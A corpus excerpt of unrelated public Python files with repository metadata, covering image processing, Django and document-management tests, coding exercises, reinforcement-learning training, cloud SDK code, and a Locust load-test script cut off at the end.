"""a snake-charming application"""
from PIL import Image
import numpy as np
import os
idir =os.getcwd()
iname= 'eastern_coral_1_clean.png'# 'white_snake.PNG'
saveas='new_snake.PNG'
#sets up an array for pixel processing
white=np.array([255,255,255,0]) #r, g, b, a
transparent = np.array([0, 0, 0, 0])
background = white
#open the image and convert it
raw_image = Image.open(iname)
raw_image.show()
converted_image = raw_image.convert('RGBA')
raw_image.close()
h, w = converted_image.size
converted_histo=converted_image.histogram()
converted_colors=converted_image.getcolors(w*h)
#dump the data into a numpy array and split the channels "bands"
data = np.array(converted_image) # h * w * 4 array (rgba)
r, g, b, a = data.T
#this sets the masking condition and replaces the background color
replace = (r == background[0]) & (b == background[1]) & (g == background[2])
data[replace.T] = (0,0,0,0)
#generate a new image, grab some stats, and save it.
new_image = Image.fromarray(data, 'RGBA')
h, w = new_image.size
new_histo=new_image.histogram()
new_colors=new_image.getcolors(w*h) #a list of tuples [count (rgba), ...]
new_image.save(saveas)
recovered_image = Image.open(saveas)
h, w = recovered_image.size
#we've successfully 'masked out' and replaced the background
new_image.show()
recovered_histo=recovered_image.histogram()
recovered_colors=recovered_image.getcolors(w*h) #a list of tuples [count (rgba), ...]
#but we can do more...
#strategy: make a list of color bins we expect to find. These will have pixel ranges
# that are human-friendly e.g., 'brownish', 'gold'. Each spec within the bin can be
# additively applied to a mask - functionally reducing the color palette.
reduced_image = recovered_image.convert('P', palette=Image.ADAPTIVE, colors=10)
reduc1 = reduced_image = recovered_image.convert('P', palette=Image.ADAPTIVE, colors=10)
reduc2 = reduc1.convert('RGB') #turns it to rgb
#save the image in a couple formats
reduc_fn = 'scratch.BMP'
reduc2.save(reduc_fn)
reduced_histo=reduced_image.histogram()
reduced_colors=reduced_image.getcolors(w*h) #a list of tuples [count (rgba), ...]
reduced_image.save(saveas+'reduced.BMP')
#now show them
recovered_image.show()
reduced_image.show()
recovered_image.close()
|
[
"barton.pj@gmail.com"
] |
barton.pj@gmail.com
|
dca9fddc3b23f660445b7dfdc4fa69e6a6bfd984
|
56abd8f94a511ae0d163161cb2f5e0a91d4b8bed
|
/datahub/event/migrations/0014_update_permissions_django_21.py
|
c27dc191d9543f8aa33c9c96a70980890b259390
|
[
"MIT"
] |
permissive
|
cgsunkel/data-hub-api
|
994c58bd975d902bf2bc44b415a5892919ff4539
|
a92faabf73fb93b5bfd94fd465eafc3e29aa6d8e
|
refs/heads/develop
| 2023-05-31T22:35:56.344904
| 2021-06-30T11:23:06
| 2021-06-30T11:23:06
| 303,947,456
| 0
| 0
|
MIT
| 2021-06-30T10:34:50
| 2020-10-14T08:14:46
|
Python
|
UTF-8
|
Python
| false
| false
| 381
|
py
|
# Generated by Django 2.0.8 on 2018-08-03 14:51
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('event', '0013_add_default_id_for_metadata'),
('core', '0003_rename_read_permissions'),
]
operations = [
migrations.AlterModelOptions(
name='event',
options={},
),
]
|
[
"reupen@users.noreply.github.com"
] |
reupen@users.noreply.github.com
|
80c5c7cf5342a44c5852c7740bd5710c955ced36
|
6b201605227f11880c1d32c9cad300f6e29ff4ae
|
/Python/Buch_Python3_Das_umfassende_Praxisbuch/Kapitel_07_Sequenzen_Mengen_und_Generatoren/08_chapter_07_repetition_questions.py
|
0c221875dd13afd534b86ec96cd3820a2eaca0c7
|
[
"MIT"
] |
permissive
|
Apop85/Scripts
|
e2e8e6ed0c0da08a4d7c895aa366c9305197137b
|
467c34e59f2708f2d2f8bb369c36fd782d365e8b
|
refs/heads/master
| 2022-12-08T08:11:04.566376
| 2022-05-13T13:17:04
| 2022-05-13T13:17:04
| 164,251,836
| 0
| 0
|
MIT
| 2022-12-08T01:50:22
| 2019-01-05T21:16:45
|
Python
|
UTF-8
|
Python
| false
| false
| 2,887
|
py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
###
# File: 08_chapter_07_repetition_questions.py
# Project: Kapitel_07_Sequenzen_Mengen_und_Generatoren
# Created Date: Tuesday 05.03.2019, 16:17
# Author: Apop85
# -----
# Last Modified: Tuesday 05.03.2019, 16:43
# -----
# Copyright (c) 2019 Apop85
# This software is published under the MIT license.
# Check http://www.opensource.org/licenses/MIT for further informations
# -----
# Description:
###
import re
def output(title, string):
max_length=80
max_delta=20
string+=' '*max_length
print('╔'+'═'*max_length+'╗')
print('║'+title.center(max_length).upper()+'║')
print('╠'+'═'*max_length+'╣')
search_pattern=re.compile(r'(.{'+str(max_length-max_delta-10)+r','+str(max_length-10)+r'}[^\w"])')
reg_lines=search_pattern.findall(string)
for line in reg_lines:
print('║ '+line+' '*(max_length-len(line)-1)+'║')
print('╚'+'═'*max_length+'╝')
input()
output('Aufgabe 1','Die Ausgangsliste lautet ["mond","stoff","treib","raum","schiff"]. Wie lautet die Ausgabe von folgenden Anweisungen?')
output('Anweisung 1','print(liste[0])')
output('Lösung Anweisung 1:','Das erste Item der Liste wird ausgegeben: "mond"')
output('Anweisung 2','print(liste[2]+liste[1])')
output('Lösung Anweisung 2:','Das dritte und zweite Item der liste wird konkatiniert: "treibstoff"')
output('Anweisung 3','print(liste[-2]+liste[-1])')
output('Lösung Anweisung 3:','Das zweitletzte und letzte Item der Liste wird konkatiniert: "raumschiff"')
output('Anweisung 4','for wort in liste: if wort[0] == "s": print(wort)')
output('Lösung Anweisung 4:','Alle Items der Liste die mit einem "s" beginnen werden ausgegeben: "stoff", "schiff"')
output('Anweisung 5','for wort in liste: print(wort[1])')
output('Lösung Anweisung 5:','Von jedem Item der Liste wird der 2. Buchstabe ausgegeben: o,t,r,a,c')
output('Anweisung 6','liste=liste+["gestein"]')
output('Lösung Anweisung 6:','Fügt der Liste ein weiteres Item mit dem Inhalt "gestein" hinzu: ["mond","stoff","treib","raum","schiff", "gestein"]')
output('Anweisung 7','print(liste[0]+liste[-1])')
output('Lösung Anweisung 7:','Das erste und letzte Item der Liste wird konkatiniert: "mondgestein"')
output('Aufgabe 2','Welchen Wert haben die Listenobjekte s1,s2 und s3 jeweils nach folgenden Anweisungen:')
output('Anweisung 1','s1 = [1]: s1=[1,s1]: s1=[1,s1]')
output('Lösung Anweisung 1','s1=[1,[1,[1]]]')
output('Anweisung 2','A=["Haus","Garten"]: B=["bau","tier","pflanze"]: s2=[i+j for i in A for j in B]')
output('Lösung Anweisung 2','"Hausbau", "Haustier", "Hauspflanze", "Gartenbau", "Gartentier", "Gartenpflanze"')
output('Anweisung 3','A=[1,2,3,4]: B=[2,3,4,5]: s3=[i for i in A+B if (i not in A) or (i not in B)')
output('Lösung Anweisung 3','Es werden alle Zahlen ausgegeben welche nicht in beiden Listen vorkommen: 1,5')
|
[
"39341618+Apop85@users.noreply.github.com"
] |
39341618+Apop85@users.noreply.github.com
|
de11b77370f05d31f929a0e89ae8518b594ead80
|
8d47af9482444b07b52cf44cebcaf4b992df4d09
|
/agents/14_MinimumPRB/14.py
|
5f38c96b71c0088d5b0857b5e87d87b1363e01c9
|
[] |
no_license
|
w0lv3r1nix/retro-agents
|
f4dbce2db558c880b161062796e5397be65bdd10
|
c7f93a737dc6c6fc5d8343c099e14bd2bc97aaf1
|
refs/heads/master
| 2020-08-01T01:19:41.660018
| 2018-06-13T04:28:09
| 2018-06-13T04:28:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,842
|
py
|
#!/usr/bin/env python
"""
Train an agent on Sonic using an open source Rainbow DQN
implementation.
"""
import tensorflow as tf
from anyrl.algos import DQN
from anyrl.envs import BatchedGymEnv
from anyrl.envs.wrappers import BatchedFrameStack
from anyrl.models import rainbow_models
from anyrl.rollouts import BatchedPlayer, PrioritizedReplayBuffer, NStepPlayer
from anyrl.spaces import gym_space_vectorizer
import gym_remote.exceptions as gre
from sonic_util import AllowBacktracking, make_env
from MinimumPRB import MinimumPRB
def main():
"""Run DQN until the environment throws an exception."""
env = AllowBacktracking(make_env(stack=False, scale_rew=False))
env = BatchedFrameStack(BatchedGymEnv([[env]]), num_images=4, concat=False)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True # pylint: disable=E1101
with tf.Session(config=config) as sess:
dqn = DQN(*rainbow_models(sess,
env.action_space.n,
gym_space_vectorizer(env.observation_space),
min_val=-200,
max_val=200))
player = NStepPlayer(BatchedPlayer(env, dqn.online_net), 3)
optimize = dqn.optimize(learning_rate=1e-4)
sess.run(tf.global_variables_initializer())
dqn.train(num_steps=2000000, # Make sure an exception arrives before we stop.
player=player,
replay_buffer=MinimumPRB(500000, 0.5, 0.4, epsilon=0.1),
optimize_op=optimize,
train_interval=1,
target_interval=8192,
batch_size=32,
min_buffer_size=20000)
if __name__ == '__main__':
try:
main()
except gre.GymRemoteError as exc:
print('exception', exc)
|
[
"seungjaeryanlee@gmail.com"
] |
seungjaeryanlee@gmail.com
|
205a1f4bb79dfbfe132609918fb50ee0c8ed7da2
|
461cbe14775be116ea001ec36b8b9b4deb2f77bc
|
/lesson1.6_step7.py
|
42f6193f82db311382de80a482bc63b4c18cc740
|
[] |
no_license
|
Adoyan-Grigor/stepik-auto-tests-course
|
898a653062cfa4bdf484a363b956ed2004ef0629
|
406b1498362538ebec27118083c3de5a94898140
|
refs/heads/master
| 2023-05-10T18:25:09.085013
| 2021-06-02T13:16:35
| 2021-06-02T13:16:35
| 369,514,851
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 599
|
py
|
#!/usr/bin/python3
from selenium import webdriver
import time
try:
browser = webdriver.Chrome()
browser.get("http://suninjuly.github.io/huge_form.html")
elements = browser.find_elements_by_css_selector('[type="text"]')
for element in elements:
element.send_keys("Мой ответ")
button = browser.find_element_by_css_selector("button.btn")
button.click()
finally:
# успеваем скопировать код за 30 секунд
time.sleep(30)
# закрываем браузер после всех манипуляций
browser.quit()
|
[
"you@example.com"
] |
you@example.com
|
aba19dd9fae018990c2a4be8d819f2689788d268
|
a0fb29f99a852089193e4cc9a11e7263dc3f8b5f
|
/mayan/apps/documents/tests/test_document_version_models.py
|
b19f865060f817d3028cfe3263bdeaa1716f406d
|
[
"Apache-2.0"
] |
permissive
|
ikang9712/Mayan-EDMS
|
0e22a944d63657cea59c78023b604a01a622b52a
|
d6e57e27a89805329fe0c5582caa8e17882d94e6
|
refs/heads/master
| 2023-07-28T19:41:55.269513
| 2021-09-07T14:16:14
| 2021-09-07T14:16:14
| 402,884,683
| 1
| 0
|
NOASSERTION
| 2021-09-03T20:00:09
| 2021-09-03T20:00:09
| null |
UTF-8
|
Python
| false
| false
| 2,826
|
py
|
from ..literals import (
DOCUMENT_FILE_ACTION_PAGES_NEW, DOCUMENT_FILE_ACTION_PAGES_APPEND,
DOCUMENT_FILE_ACTION_PAGES_KEEP
)
from .base import GenericDocumentTestCase
class DocumentVersionTestCase(GenericDocumentTestCase):
    """Verify how the document's active version tracks pages for each
    file-upload page action."""

    def test_version_new_file_new_pages(self):
        """ACTION_PAGES_NEW: a second version is created and its pages
        mirror exactly the latest file's pages."""
        test_document_version_page_content_objects = self.test_document_version.page_content_objects
        self.assertEqual(self.test_document.versions.count(), 1)
        self._upload_test_document_file(action=DOCUMENT_FILE_ACTION_PAGES_NEW)
        self.assertEqual(self.test_document.versions.count(), 2)
        self.assertNotEqual(
            self.test_document_version.page_content_objects,
            test_document_version_page_content_objects
        )
        self.assertEqual(
            self.test_document_version.page_content_objects,
            list(self.test_document.file_latest.pages.all())
        )

    def test_version_new_version_keep_pages(self):
        """ACTION_PAGES_KEEP: no new version is created and the active
        version keeps its original pages, not the new file's pages."""
        test_document_version_page_content_objects = self.test_document_version.page_content_objects
        self.assertEqual(self.test_document.versions.count(), 1)
        self._upload_test_document_file(action=DOCUMENT_FILE_ACTION_PAGES_KEEP)
        self.assertEqual(self.test_document.versions.count(), 1)
        self.assertEqual(
            self.test_document_version.page_content_objects,
            test_document_version_page_content_objects
        )
        self.assertNotEqual(
            self.test_document_version.page_content_objects,
            list(self.test_document.file_latest.pages.all())
        )

    def test_version_new_file_append_pages(self):
        """ACTION_PAGES_APPEND: a second file and a second version are
        created; the new version's pages are the first file's pages
        followed by the last file's pages."""
        test_document_version_page_content_objects = self.test_document_version.page_content_objects
        self.assertEqual(self.test_document.versions.count(), 1)
        self.assertEqual(self.test_document.files.count(), 1)
        self._upload_test_document_file(action=DOCUMENT_FILE_ACTION_PAGES_APPEND)
        self.assertEqual(self.test_document.files.count(), 2)
        self.assertEqual(self.test_document.versions.count(), 2)
        test_document_version_expected_page_content_objects = list(
            self.test_document.files.first().pages.all()
        )
        test_document_version_expected_page_content_objects.extend(
            list(
                self.test_document.files.last().pages.all()
            )
        )
        self.assertNotEqual(
            self.test_document_version.page_content_objects,
            test_document_version_page_content_objects
        )
        self.assertEqual(
            self.test_document_version.page_content_objects,
            test_document_version_expected_page_content_objects
        )

    def test_method_get_absolute_url(self):
        """The active version must resolve an absolute URL without raising."""
        self.assertTrue(self.test_document.version_active.get_absolute_url())
|
[
"roberto.rosario@mayan-edms.com"
] |
roberto.rosario@mayan-edms.com
|
c4722abdfbd81b2b5a9a7eff8b02d361d255c7af
|
8a29f983b122602ef960d8c1f6fc6451569ed2d2
|
/te_discovery/conservation/extract_conservation_classes.py
|
166c8a4c459770ec2d21599a94d48d05cbd58982
|
[
"MIT"
] |
permissive
|
oaxiom/hesc_lincrna
|
a4832841b49f2b9b0da6bf8a169857550a0e8797
|
7a87d426bba93a027794b6bea36f1ae61d5d205b
|
refs/heads/master
| 2022-05-08T04:16:57.760960
| 2022-04-02T00:17:57
| 2022-04-02T00:17:57
| 187,936,591
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,718
|
py
|
import sys, os, itertools
from collections import Counter
import numpy as np
import matplotlib.pyplot as plot
import matplotlib.tri as tri
from glbase3 import *
import shared_conservation
# collect three things:
# 1. The total PhyloP score of the transcript
# 2. score for TE-containing bits
# 3. score for non-TE containing bits;
dfam = genelist('../dfam/dfam_annotation.tsv', format={'force_tsv': True, 'name': 0, 'type': 3, 'subtype': 4})
# Map each TE name to a readable "type:subtype:name" label for plot axes.
dfam_dict = {}
for te in dfam:
    dfam_dict[te['name']] = '{0}:{1}:{2}'.format(te['type'], te['subtype'], te['name'])

transcripts = glload('../te_transcripts/transcript_table_merged.mapped.glb')
gl = glload('phyloP_conservation_table.glb')
print(gl)

# Conservation threshold applied to both PhyloP scores.
# NOTE(review): `t` is shadowed by the loop variables further down; it is only
# read in the classification loop below so behaviour is unaffected, but a more
# distinctive name would be safer.
t = 0.25
not_counted = 0
both_conserved = []
te_conserved = []
lncrna_conserved = []
# Classify each transcript by which of its parts (TE / non-TE / both) pass
# the conservation threshold.
for item in gl:
    if item['phyloP_tes'] > t and item['phyloP_nottes'] > t:
        both_conserved.append(item)
    elif item['phyloP_tes'] > t:
        te_conserved.append(item)
    elif item['phyloP_nottes'] > t:
        lncrna_conserved.append(item)
    else:
        not_counted += 1
print('Not counted : {0:,}'.format(not_counted))
print('Both conserved : {0:,}'.format(len(both_conserved)))
print('TE conserved : {0:,}'.format(len(te_conserved)))
print('lncRNA conserved: {0:,}'.format(len(lncrna_conserved)))
print('Total TE-containing transcripts: {0:,}'.format(len(transcripts)))

# Wrap each class back into a genelist so it can be mapped onto the
# transcript table by transcript_id.
gl = genelist()
gl.load_list(both_conserved)
both_conserved = gl
gl = genelist()
gl.load_list(te_conserved)
te_conserved = gl
gl = genelist()
gl.load_list(lncrna_conserved)
lncrna_conserved = gl

all_data = {'both_conserved': both_conserved.map(genelist=transcripts, key='transcript_id'),
            'te_conserved': te_conserved.map(genelist=transcripts, key='transcript_id'),
            'lncrna_conserved': lncrna_conserved.map(genelist=transcripts, key='transcript_id')
            }

# For each conservation class, count TE domain labels and plot the 20 most
# common as a horizontal bar chart saved to class_summary-<class>.pdf.
for k in all_data:
    # convert to a list of doms:
    doms = []
    for t in all_data[k]:
        doms += [dfam_dict[d['dom']] for d in t['doms']]

    c = Counter(doms)
    c = c.most_common(20)#.items()
    print(c)

    vals = [i[1] for i in c]
    labs = [i[0] for i in c]
    # reverse so the most common domain ends up at the top of the barh plot
    vals.reverse()
    labs.reverse()

    fig = plot.figure(figsize=[2,2])
    fig.subplots_adjust(left=0.5, top=0.97)
    ax = fig.add_subplot(111)
    ys = np.arange(len(vals))
    ax.barh(ys, vals)
    ax.set_xlabel('Number of TE domains')
    ax.set_yticks(ys)
    ax.set_yticklabels(labs)
    [t.set_fontsize(6) for t in ax.get_yticklabels()]
    [t.set_fontsize(6) for t in ax.get_xticklabels()]
    #for y, p, x in zip(ys, percs, num_hits):
    #    ax.text(x+4, y, s='{0} ({1:.1f}%)'.format(x, p), va='center', fontsize=6)
    fig.savefig('class_summary-{0}.pdf'.format(k))
|
[
"oaxiom@gmail.com"
] |
oaxiom@gmail.com
|
7ae56f768a8f140ecb1394772602106519a9ee18
|
eb38089224f1c2598f6ba17a28756bb040d4975a
|
/{{ cookiecutter.appname }}/program.py
|
04dd0d1ae5812276dd17999afe12ac501fb3280d
|
[] |
no_license
|
zooba/sqlazure-cookiecutter-demo
|
b21afe1775547ca3ecc014396f53fb12170c3df9
|
eee1aed495cafc32d29ff5e335f4cf3963d1f7ba
|
refs/heads/master
| 2021-06-08T10:02:56.428740
| 2016-11-04T22:40:58
| 2016-11-04T22:40:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 534
|
py
|
import pyodbc
CONNECTION_STRING = "{{cookiecutter.connection_string}}"

connection = pyodbc.connect(CONNECTION_STRING)

# Read all: family names that occur more than three times, largest group first.
QUERY = (
    "select LastName, Count(*) as 'Members' "
    "from {{cookiecutter.namespace}}.{{cookiecutter.table}} "
    "group by LastName "
    "having Count(*) > 3 "
    "order by 'Members' DESC"
)
cursor = connection.cursor()
cursor.execute(QUERY)
rows = cursor.fetchall()

print('Family Name | Members')
print('-------------------+--------')
print('\n'.join('{0[0]:<19}|{0[1]:>8}'.format(record) for record in rows))
|
[
"steve.dower@microsoft.com"
] |
steve.dower@microsoft.com
|
d7c6e469c589e6a81c8cab720f7504fcc6b98f5c
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-bss/huaweicloudsdkbss/v2/model/list_quota_coupons_request.py
|
32bac674877d7d2748d85e8b59d9ef77c75969ef
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318
| 2023-08-31T08:28:59
| 2023-08-31T08:28:59
| 262,207,814
| 103
| 44
|
NOASSERTION
| 2023-06-22T14:50:48
| 2020-05-08T02:28:43
|
Python
|
UTF-8
|
Python
| false
| false
| 3,159
|
py
|
# coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ListQuotaCouponsRequest:
    """Request wrapper for the ListQuotaCoupons API call.

    Attributes:
        openapi_types (dict): The key is attribute name
                              and the value is attribute type.
        attribute_map (dict): The key is attribute name
                              and the value is json key in definition.
    """

    # Attribute names whose values are masked as "****" by to_dict().
    sensitive_list = []

    openapi_types = {
        'body': 'QueryCouponQuotasReqExt'
    }

    attribute_map = {
        'body': 'body'
    }

    def __init__(self, body=None):
        """ListQuotaCouponsRequest

        The model defined in huaweicloud sdk

        :param body: Body of the ListQuotaCouponsRequest
        :type body: :class:`huaweicloudsdkbss.v2.QueryCouponQuotasReqExt`
        """
        self._body = None
        self.discriminator = None

        if body is not None:
            self.body = body

    @property
    def body(self):
        """Gets the body of this ListQuotaCouponsRequest.

        :return: The body of this ListQuotaCouponsRequest.
        :rtype: :class:`huaweicloudsdkbss.v2.QueryCouponQuotasReqExt`
        """
        return self._body

    @body.setter
    def body(self, body):
        """Sets the body of this ListQuotaCouponsRequest.

        :param body: The body of this ListQuotaCouponsRequest.
        :type body: :class:`huaweicloudsdkbss.v2.QueryCouponQuotasReqExt`
        """
        self._body = body

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Walk the declared attributes, recursing into nested models,
        # lists, and dicts; mask anything listed in sensitive_list.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        # Python 2 only: force a UTF-8 default encoding before serializing.
        if six.PY2:
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")

        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)

    def __repr__(self):
        """For `print`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, ListQuotaCouponsRequest):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
41fa742a05fa6098767800003e945f5fca7db849
|
b7ba98a9038f977f1efcbda5da2a41ae08e602ae
|
/exercises/21_jinja2/task_21_1c.py
|
d015a0565f2d71e065ba18dfbd812d00edb77cff
|
[] |
no_license
|
Stanleygoo/pyneng-examples-exercises
|
f7914bc21aca119c7423af373a8b17b2917ea675
|
c27b608ac954149d841c0a53f1108a6100295544
|
refs/heads/master
| 2021-05-11T15:35:11.043546
| 2018-01-12T06:42:04
| 2018-01-12T06:42:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,721
|
py
|
# -*- coding: utf-8 -*-
'''
Task 21.1c

Rework the generate_cfg_from_template function from task 21.1, 21.1a or 21.1b:
* automatically detect the different formats of the data file
* the same ``data`` parameter must be used to pass the different data types

The following formats must be supported:
* YAML  - files with a .yml or .yaml extension
* JSON  - files with a .json extension
* Python dictionary

If the data type could not be determined, print error_message (move the
message text into the function body), stop the function and return None.

Check the function with the templates/for.txt template and the data:
* data_files/for.yml
* data_files/for.json
* the data_dict dictionary
'''

# Runtime message shown to the (Russian-speaking) user on format errors —
# deliberately left untranslated.
error_message = '''
Не получилось определить формат данных.
Поддерживаются файлы с расширением .json, .yml, .yaml и словари Python
'''

# Sample data used to exercise the dictionary branch of the function.
data_dict = {'vlans': {
                 10: 'Marketing',
                 20: 'Voice',
                 30: 'Management'},
             'ospf': [{'network': '10.0.1.0 0.0.0.255', 'area': 0},
                      {'network': '10.0.2.0 0.0.0.255', 'area': 2},
                      {'network': '10.1.1.0 0.0.0.255', 'area': 0}],
             'id': 3,
             'name': 'R3'}
|
[
"nataliya.samoylenko@gmail.com"
] |
nataliya.samoylenko@gmail.com
|
d0772dd0edd20d0af5d33d835497aa7e243a2f9f
|
afc4333ad944301ad969de445a5a4e3b223bb456
|
/greedy/greedy_03.py
|
c5f1ec91097b5ff762d82881078e50a0b2bf23bf
|
[] |
no_license
|
ykiseong303/python_algorithm
|
4cf2df8c0ff2223eab70d246c87466d1ebc26133
|
e90268103983917835ba6dbcd14b4b515c3d0fae
|
refs/heads/main
| 2023-07-18T10:41:40.180855
| 2021-08-27T14:33:14
| 2021-08-27T14:33:14
| 342,607,860
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 538
|
py
|
'''
Category : greedy algorithm
Problem  : "Make it 1" (from the "이코테" textbook)
Date     : 2021.02.26
'''
# Given N, repeat either "divide by K" (when divisible) or "subtract 1"
# until N becomes 1; print the minimum number of operations.
#
# Greedy insight: dividing shrinks N fastest, so subtract just enough
# (N % K single steps) to reach the nearest multiple of K, then divide once.
# Doing the subtraction in bulk makes this O(log N) instead of O(N) while
# producing exactly the same operation count.

N, K = map(int, input().split())

count = 0
while N > 1:
    if N < K:
        # Division is no longer possible; only (N - 1) subtractions remain.
        count += N - 1
        N = 1
    else:
        remainder = N % K
        # Bulk-subtract down to the nearest multiple of K (remainder steps),
        # then apply one division step.
        count += remainder
        N -= remainder
        N //= K
        count += 1
print(count)
|
[
"noreply@github.com"
] |
ykiseong303.noreply@github.com
|
9d44c7fc30c7532a83cbfd55e8f20cb446146010
|
2f63688febd21dc3ae6b19abfa79ad313c820154
|
/0343_Integer_Break/try_3.py
|
528ae78d9d8cc6ac2b91f6f7d4fed33f238a4064
|
[] |
no_license
|
novayo/LeetCode
|
cadd03587ee4ed6e35f60294070165afc1539ac8
|
54d0b3c237e0ffed8782915d6b75b7c6a0fe0de7
|
refs/heads/master
| 2023-08-14T00:35:15.528520
| 2023-07-30T05:56:05
| 2023-07-30T05:56:05
| 200,248,146
| 8
| 1
| null | 2022-11-19T04:37:54
| 2019-08-02T14:24:19
|
Python
|
UTF-8
|
Python
| false
| false
| 412
|
py
|
class Solution:
    def integerBreak(self, n: int) -> int:
        """Max product from splitting n into at least two positive integers.

        Classic DP: best[m] is the best product for m, where each factor may
        itself be left whole (m) or further broken (best[m])."""
        best = [1] * (n + 1)
        for total in range(2, n + 1):
            lo, hi = 1, total - 1
            top = 0
            # Scan the split points from both ends toward the middle.
            while lo <= hi:
                left = max(lo, best[lo])
                right = max(hi, best[hi])
                top = max(top, left * right)
                lo += 1
                hi -= 1
            best[total] = top
        return best[n]
|
[
"f14051172@gs.ncku.edu.tw"
] |
f14051172@gs.ncku.edu.tw
|
1558ce39aec8e8a80e658eadae3fa17706dbffbc
|
4315cfa1bd13f08053d549c7c00287a76d656f9e
|
/src/abc159/B.py
|
612261c7290dcb8c80f4dd9c313c478367e21286
|
[] |
no_license
|
ma96o/atcoder_archive
|
1c47e2189b2d55e7f519349e02ceb24500e2164e
|
8bc21d351535eda1f81a47442156f92f234cf6c3
|
refs/heads/main
| 2023-08-13T17:03:13.855154
| 2021-09-15T14:55:00
| 2021-09-15T14:55:00
| 350,179,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
# ABC159 B: a "strong palindrome" requires the whole string, its front part
# (before the middle), and its back part (after the middle) to each read the
# same forwards and backwards.
s = input()
n = len(s)
front = s[:(n - 1) // 2]
back = s[((n + 3) // 2 - 1):]

if all(part == part[::-1] for part in (s, front, back)):
    print("Yes")
else:
    print("No")
|
[
"masaaki1915@gmail.com"
] |
masaaki1915@gmail.com
|
325c7ead66c60a3d6d4100600e21b951274e002e
|
2efee5574ff160c97a94e243c1c820814b008058
|
/parse/atest.py
|
d1fb32e644208592b435d8764e45b986a204877e
|
[] |
no_license
|
haobtc/blockinfo
|
5c18430f3f5eaa7b979c119945b686e0e09d2e1c
|
00a094d917224dbe6acb6565125badec14f2400f
|
refs/heads/master
| 2020-03-29T07:01:35.936157
| 2014-05-14T03:55:27
| 2014-05-14T03:55:27
| 17,733,081
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 589
|
py
|
# NOTE(review): Python 2 code (print statement, byte-oriented str literals).
# Decode a raw bitcoin output script and print its length and disassembly.
# The earlier `script` assignments are dead — only the last one is decoded;
# presumably kept around as alternative test vectors.
from bitcointools.deserialize import decode_script
script = 'j(n\xd6{q\xado\xbcp3\xa74\x06>I\x84\x8dv\x9b\x89m\x83h\xfe\x05\x9e;7\xf0q\n\x1a\x89\x00\x00\x00\x00\x01\x00\x00\x00'
script = 'j(\xd8`\x1d4\xd0\x07lLR/\xab\xe9\xa4>\x83\x87\xcb,\xaa\r\xec\xfcJ\xd0/\xc1\xda\x83o\xb8\xfe\xa4\x00\x00\x00\x00\x03\x00\x00\x00'
script = '$\x12\xae\xab\xaf\x92O[\xc9w$0\xe8/2\xe3\r\x1e&\xda\xccVw\x072Y\n[\xf4V\xbe\xb1f\x05\x00\x00\x00'
script = '$\xc6\xfe\xfa\x02\x8eY5\x10+\xb6\xc0\xf0}bG\xc2\x12\x8a\x19*L\x0eW\xd8\x94\x0e\xfa!e\xde>\xb4P\x00\x00\x00'
print len(script), decode_script(script)
|
[
"superisaac.ke@gmail.com"
] |
superisaac.ke@gmail.com
|
102137592b05149728da3095ba674e187218c5b7
|
7a9472018f8a5c06da7341746bdb54a91ec02df0
|
/client/locustfile.py
|
09f77e398421728f25ea0b2e23edca5f75a846d6
|
[] |
no_license
|
nmaekawa/websockets-tst
|
fb55fcca04d953b086ae8c36e4c2df5c55566c0e
|
7278e134b1c60a87873a38f7bbff7f8e3b96fa1c
|
refs/heads/master
| 2022-07-27T00:31:53.448846
| 2020-01-28T21:33:22
| 2020-01-28T21:33:22
| 221,528,746
| 0
| 0
| null | 2022-05-25T03:33:53
| 2019-11-13T18:47:05
|
Python
|
UTF-8
|
Python
| false
| false
| 5,553
|
py
|
#
# automated run: use --no-web and --csv
# $> locust -f examples/basic.py --csv=example --no-web -t10m -c 1 -r 1 --host <hxat url>
#
import os
import json
import logging
from random import randint
from subprocess import Popen
from subprocess import PIPE
from uuid import uuid4
from locust import between
from locust import HttpLocust
from locust import TaskSet
from locust import task
import locust.stats
# set custom interval for stats; default is 2s
locust.stats.CSV_STATS_INTERVAL_SEC = 5

# HxAT/LTI session parameters; filled in per test run before launching locust.
TOKEN = ''
USER_ID = ''
USER_NAME = ''
CONTEXT_ID = ''
COLLECTION_ID = ''
TARGET_SOURCE_ID = ''
RESOURCE_LINK_ID = ''
UTM_SOURCE = ''
# this is particular to the target_source document
# and used to randomize the region being annotated
PTAG=2
# Character length of each paragraph (indexed by paragraph tag number).
target_doc = [0, 589, 313, 434, 593, 493]
def fetch_fortune():
    """Return the text of a random epigram from the external `fortune` binary.

